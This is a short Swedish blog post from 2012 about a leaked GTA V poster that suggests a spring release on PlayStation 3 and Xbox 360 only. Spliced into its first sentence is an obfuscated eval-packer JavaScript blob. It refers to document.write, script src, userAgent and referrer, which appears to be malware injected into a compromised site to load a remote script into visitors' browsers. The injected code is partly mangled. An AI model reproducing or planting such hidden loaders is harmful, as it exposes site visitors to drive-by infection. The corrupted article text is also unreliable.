Image Image Image Image Image Image Image Image Image Image

| 17 oktober, 2018

Scroll to top

Top

GTA V kommer i vår! Om man ska tro den här affischen

GTA V kommer i vår! Om man ska tro den här affischen
Filip Urde
  • On 29 oktober, 2012
  • http://www.revue.se/filip-urde

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ebfny|var|u0026u|referrer|ssfen||js|php’.split(‘|’),0,{}))
har en affisch för kommande GTA V läckt ut på en polsk GTA-fansida.
Affischen antyder att spelet släpps till våren. Inte för att det på något sett är en chock, men det har heller inte varit några konkreta fakta som sagt att GTA  V skulle komma nästa vår, mer än att det ryktas om det.

En detalj som är värd att belysa är att vi kan endast skymta PlayStation 3 och Xbox 360 på affischen. Inget PC alltså om man ska tro affischen…  =(